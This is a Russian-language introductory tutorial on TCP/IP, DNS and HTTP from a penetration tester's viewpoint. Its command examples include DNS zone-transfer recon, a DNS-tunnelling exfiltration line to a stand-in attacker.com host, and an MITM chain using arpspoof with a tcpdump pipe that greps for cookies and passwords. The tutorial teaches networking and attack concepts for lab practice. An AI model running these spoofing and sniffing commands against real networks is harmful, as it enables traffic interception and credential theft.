Большинство людей пользуются интернетом как микроволновкой — нажал кнопку, работает. Хакер смотрит внутрь и видит провода, которые можно потрогать. Давай потрогаем.
Понять, как ломать — значит сначала понять, как работает. Без этого ты просто запускаешь чужие скрипты и молишься. С этим — ты видишь точки входа там, где другие видят просто сайт.
🌐 TCP/IP — фундамент всего
TCP/IP — это не один протокол, а стек из четырёх уровней. Думай о нём как о почтовой системе: конверт (IP) знает адрес, а почтальон (TCP) гарантирует доставку и подтверждение получения.
Модель на пальцах:
| Уровень | Что делает | Пример |
|---|---|---|
| Канальный | Передача по физической сети | Ethernet, Wi-Fi, MAC-адреса |
| Сетевой | Маршрутизация пакетов | IP-адрес, ICMP, ARP |
| Транспортный | Доставка данных между приложениями | TCP, UDP |
| Прикладной | Протоколы для человека | HTTP, DNS, FTP, SSH |
Трёхстороннее рукопожатие TCP — твоя первая точка входа
Каждое TCP-соединение начинается с SYN → SYN-ACK → ACK. Это «привет, я здесь — привет, слышу тебя — отлично, начинаем»
|
1 2 |
# Смотришь рукопожатия в реальном времени: tcpdump -i eth0 "tcp[tcpflags] & tcp-syn != 0" |
Где тут хакерское? SYN-флуд — классика жанра. Атакующий шлёт тысячи SYN-пакетов и игнорирует SYN-ACK, заставляя сервер держать тысячи полуоткрытых соединений до исчерпания ресурсов. Сервер думает, что ты хочешь поговорить, а ты просто занял все стулья.
|
1 2 |
# Анализ SYN-flood признаков на хосте: netstat -an | grep SYN_RECV | wc -l |
🗂️ DNS — телефонная книга, которую можно отравить
DNS (Domain Name System) переводит google.com в 142.250.185.46. Без него ты вводишь IP-адреса вручную, как в 1995-м.
Как работает запрос DNS:
|
1 |
Ты → Резолвер (провайдер) → Корневой сервер → TLD (.com) → Авторитативный NS → IP |
Весь этот путь занимает миллисекунды. Результат кэшируется на время TTL (бывает до 86 400 секунд = сутки).
Векторы атак на DNS 💣
1. DNS Spoofing (отравление кэша)
Атакующий брутфорсит 16-битный TXID (Transaction ID) и подсовывает фейковый ответ раньше легитимного. Резолвер кэширует ложный IP — и весь трафик идёт на твой сервер до истечения TTL.
|
1 2 3 |
Жертва запрашивает: bank.com → ? Хакер отвечает первым: bank.com → 185.239.239.x (твой фишинг) Резолвер кэширует. Сутки все клиенты идут к тебе. 🎭 |
2. DNS Tunneling — данные через DNS
DNS-запросы обычно пропускают любые файрволы — это «безобидный» трафик. Хакеры кодируют данные в поддомены и эксфильтруют их незаметно:
|
1 |
secretdata.base64encoded.attacker.com → TXT-ответ с командой |
Используется для C2-каналов (Command & Control) даже внутри корпоративных сетей с жёсткой фильтрацией.
3. Разведка через DNS
До любой атаки — DNS-разведка. Это легально и делается пассивно
|
1 2 3 4 5 6 7 8 |
# Перебор поддоменов: dnsenum --dnsserver 8.8.8.8 --enum target.com # Зонная передача (если администратор криворукий): dig axfr @ns1.target.com target.com # Быстрый лукап: nslookup -type=ANY target.com |
💡 Если dig axfr вернул список всех хостов — поздравляю, сисадмин только что подарил тебе карту сети. Такое встречается чаще, чем думаешь.
🌍 HTTP/HTTPS — протокол, на котором живёт веб
HTTP — текстовый протокол запроса-ответа. Ты просишь (GET /index.html) — сервер отвечает (200 OK + контент). Всё прозрачно, как стекло.
HTTPS = HTTP + TLS-шифрование. Трафик зашифрован, но метаданные (домен, объём, тайминг) всё равно видны наблюдателю.
Анатомия HTTP-запроса
|
1 2 3 4 5 |
GET /admin/panel HTTP/1.1 Host: target.com Cookie: session=eyJhbGci... User-Agent: Mozilla/5.0 Authorization: Bearer eyJhbGci... |
Каждый заголовок — потенциальная точка атаки:
| Заголовок | Что смотрит хакер |
|---|---|
Cookie |
Угон сессии, XSS-кража |
Authorization |
JWT-атаки, слабые токены |
Host |
Host Header Injection |
Referer |
Утечка внутренних URL |
X-Forwarded-For |
Обход IP-фильтрации |
HTTP-методы глазами пентестера
|
1 2 3 4 5 |
GET — читаем данные (безопасно) POST — отправляем данные → инъекции, CSRF PUT — загружаем файлы → загрузка шелла? DELETE — удаляем ресурсы → проверяем авторизацию TRACE — эхо запроса → XST-атаки (устарело, но встречается) |
|
1 2 3 4 5 |
# Смотрим, какие методы поддерживает сервер: curl -X OPTIONS https://target.com -i # Перехватываем весь HTTP-трафик через Burp: # Proxy → HTTP history → смотришь каждый запрос как рентген |
🔗 Всё вместе: цепочка атаки MITM
Понимание TCP/IP + DNS + HTTP даёт тебе Man-in-the-Middle — классику, которая всё ещё работает в локальных сетях:
|
1 2 3 4 |
1. ARP Spoofing → ты в середине между жертвой и роутером 2. DNS Spoofing → подменяешь IP нужного домена 3. HTTP перехват → читаешь/модифицируешь трафик 4. ??? → PROFIT 💰 |
|
1 2 3 4 5 |
# ARP-спуфинг (только в своей лаборатории!): arpspoof -i eth0 -t 192.168.1.100 192.168.1.1 # Дамп HTTP-трафика жертвы: tcpdump -i eth0 -A port 80 | grep -E "GET|POST|Cookie|password" |
🛠️ Твой домашний стенд для практики
Не трогай чужое — подними своё:
|
1 2 3 4 5 6 7 8 |
# Wireshark — смотришь живой трафик: sudo wireshark & # Запускаешь локальный DNS-сервер и смотришь запросы: sudo tcpdump -i lo port 53 # Простой HTTP-сервер для перехвата запросов: python3 -m http.server 8080 |
🔍 Платформы для практики: TryHackMe — комнаты по сетям и протоколам, HackTheBox — машины с реальными сетевыми уязвимостями. Там всё легально и специально сломано для тебя.
💣 Итог: что даёт понимание протоколов
Без знания TCP/IP, DNS и HTTP ты — скрипт-кидди с Kali и набором команд из YouTube. С ним — ты видишь сеть: где данные текут открытым текстом, где кэш можно отравить, где заголовок выдаёт внутреннюю архитектуру. Это разница между «запустил Metasploit» и «понял, почему это сработало».
Wireshark + Burp Suite + 30 минут на любом сайте дадут тебе больше понимания, чем неделя теории. Открой — и смотри. 👁️
